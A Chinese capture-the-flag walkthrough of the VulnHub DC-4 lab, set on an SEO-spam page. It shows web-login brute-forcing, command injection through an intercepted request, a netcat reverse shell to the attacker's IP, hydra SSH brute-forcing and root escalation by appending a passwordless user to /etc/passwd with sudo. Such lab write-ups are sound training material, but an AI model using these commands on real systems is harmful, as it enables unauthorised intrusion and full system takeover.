当前位置: 首页 > wzjs >正文

无水印效果图网站西安seo外包平台

无水印效果图网站,西安seo外包平台,如何进行网站调试,网站名称怎么填写下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag

http://www.dtcms.com/wzjs/501159.html

相关文章:

  • 对比的网站建设长沙官网seo技术厂家
  • 怎么做网站评估360优化大师官方下载手机
  • 网站建设案例分析合肥百度推广优化
  • 上海市建设考核中心网站品牌活动策划
  • 一个网站做多少页面数量合适昆明seo
  • 大学生做网站步骤电脑培训班一般要学多久
  • 企业网站wap源码黑龙seo网站优化
  • 做最好的win7系统下载网站近期时事新闻
  • 网站需要去工信部做备案网站统计器
  • 购物网站建设策划书seo查询系统源码
  • 深圳网站建设公司信任湖南岚鸿信 赖云南网站建设公司哪家好
  • 网站怎么做短信ip限定搜索指数的数据来源是什么
  • 网站建设上qq图标去除一个新产品策划方案
  • 有源码帮忙搭建网站吗电话营销销售系统
  • 网站建设案例 优帮云江苏网站推广公司
  • 西安市未央区最新消息网站seo是什么意思
  • 合肥网站建设公司转让长沙全网推广
  • 网站推广句子广州百度seo 网站推广
  • 政府网站集约化建设有什么作用五种关键词优化工具
  • asp企业网站广告门
  • 有没有可以做翻译的网站360推广客服电话是多少
  • 大发快三网站自做网站建设合同模板
  • 哪个网站做关于党建述职的材料sem竞价托管价格
  • 南京溧水城市建设集团网站seo是做什么的
  • 西安网站建设公司排名百度搜索排名怎么做
  • 力杨网站建设图床外链生成工具
  • 游戏推广员上班靠谱吗整站排名优化品牌
  • 做网站时图片要切片有什么作用竞价推广开户
  • wordpress5.0启多站点百度学术官网论文查重免费
  • 折腾wordpress自己怎么优化网站排名